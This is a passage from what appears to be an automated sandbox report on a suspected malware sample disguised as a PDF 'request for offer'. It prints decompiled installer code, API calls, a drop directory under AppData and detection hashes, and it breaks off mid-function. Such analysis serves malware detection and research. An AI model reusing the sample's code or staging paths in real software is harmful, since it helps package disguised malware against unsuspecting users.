				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C53(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C53(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C53();
					_t32 = E00402C53();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C31();
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t41 = E00402C31(2);
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406159();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a81
0x00402a81
0x00402ade
0x00402aea

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401ED5() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402C53(_t25);
				E00405371(0xffffffeb, _t14); // executed
				_t16 = E004058F2(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x20)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406628(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 0x38);
						if( *((intOrPtr*)(_t32 - 0x24)) < _t25) {
							if( *(_t32 - 0x38) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E00406159( *((intOrPtr*)(_t32 - 0xc)),  *(_t32 - 0x38));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}

0x00401edb
0x00401ee0
0x00401ee6
0x00401eed
0x00401ef0
0x004028a1
0x00401ef6
0x00401ef9
0x00401f04
0x00401f1b
0x00401f0f
0x00401f19
0x00401f19
0x00401f26
0x00401f2f
0x00401f41
0x00401f43
0x00401f43
0x00401f31
0x00401f37
0x00401f37
0x00401f2f
0x00401f4a
0x00401f4d
0x00401f4d
0x00402ade
0x00402aea

APIs

Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00402EAD), ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll), ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: ce7dc248cf4a9dd33af7e15477d0c375f4c3b8e1d8e99dfa883e235551a27c37
Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
Opcode Fuzzy Hash: ce7dc248cf4a9dd33af7e15477d0c375f4c3b8e1d8e99dfa883e235551a27c37
Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C53(0xfffffff0);
				_t17 = E00405C71(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405BF3(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004058BD( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004058DA(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405840( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x0040224b
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ade
0x00402aea

APIs

Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30, 4t.t,?,74E02EE0,00405A23,?,74E03420,74E02EE0,00000000), ref: 00405C7F
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 00401640

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane
API String ID: 1892508949-444594325
Opcode ID: f30c5d767560ea3565df2f2c576c3cd55294cfbafb15c6704b28581037b9f2c2
Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
Opcode Fuzzy Hash: f30c5d767560ea3565df2f2c576c3cd55294cfbafb15c6704b28581037b9f2c2
Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004058F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058F2(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058fb
0x0040591b
0x00405923
0x00405928
0x00000000
0x0040592e
0x00405932

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
CloseHandle.KERNEL32(?), ref: 00405928

Strings

Error launching installer, xrefs: 00405905

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406D0F Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406D0F() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040717D))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
